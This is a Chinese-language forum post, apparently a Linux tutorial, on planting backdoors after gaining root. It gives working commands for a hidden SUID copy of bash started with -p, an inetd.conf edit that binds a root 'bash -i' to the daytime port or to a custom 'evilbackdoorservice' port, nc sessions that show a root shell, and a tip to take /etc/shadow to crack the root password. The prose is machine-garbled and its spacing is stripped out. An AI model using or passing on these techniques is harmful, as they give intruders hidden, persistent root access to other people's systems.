|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
欢迎大家来到仓酷云论坛!你如今已是root用户,想留一个后门。
体系情况:
dawg:~#uname-a
Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux
1.SUIDshell
起首,先切换成为root用户,并实行以下的下令:
dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot
固然,你也能够起其他更具有埋没性的名字,我想大方并机灵的你,一定能想出良多好的名字的。文件后面的那一点也不是需要的,只是为了埋没文件(在文件名的最后面加上“.”,就能够在恣意文件目次下举行埋没).
如今,做为一个一般用户,我们来启用这个后门:
fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$
为何不可呢?
由于bash2针对suid有一些保护的办法.但这也不是不成破的:
.woot-2.05b$/.woot-p
.woot-2.05b#id
uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)
利用-p参数来猎取一个rootshell.这个euid的意义是effectiveuserid(关于这些ID的常识,能够戳这里)
这里要出格注重的是,作为一个一般用户实行这个SUIDshell时,必定要利用全路径。
小常识:
怎样查找那些具有SUID的文件:
dawg:~#find/-perm+4000-ls
这时候就会前往具有SUID位的文件啦。
2.近程后门:使用/etc/inetd.conf
我们利用vi来修正/etc/inetd.conf文件
原文件:
#chargendgramudpwaitrootinternal
#discardstreamtcpnowaitrootinternal
#discarddgramudpwaitrootinternal
#daytimestreamtcpnowaitrootinternal
修正为:
#discardstreamtcpnowaitrootinternal
#discarddgramudpwaitrootinternal
daytimestreamtcpnowaitroot/bin/bashbash-i
开启inetd:
dawg:~#inetd
假如要强迫重启inetd:
dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362
如今我们就能够用nc来爆菊了:
C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA
(UNKNOWN)[192.168.1.77]13(daytime)open
bash:nojobcontrolinthisshell
bash-2.05b#bash-2.05b#
bash-2.05b#iduid=0(root)
gid=0(root)groups=0(root)bash-2.05b#uname-a
Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux
小贴士:
我们能够修正/etc/services文件,到场以下的器材:
woot6666/tcp#evilbackdoorservice
然后修正/etc/inetd.conf:
wootstreamtcpnowaitroot/bin/bashbash-i
我们能够修正成一些罕见的端口,以完成埋没。
小编感言:实在下/etc/shadow文件,爆破root的暗码才最保险啊!
如果您觉得本篇CentOSLinux教程讲得好,请记得点击右边漂浮的分享程序,把好文章分享给你的小伙伴们! |
|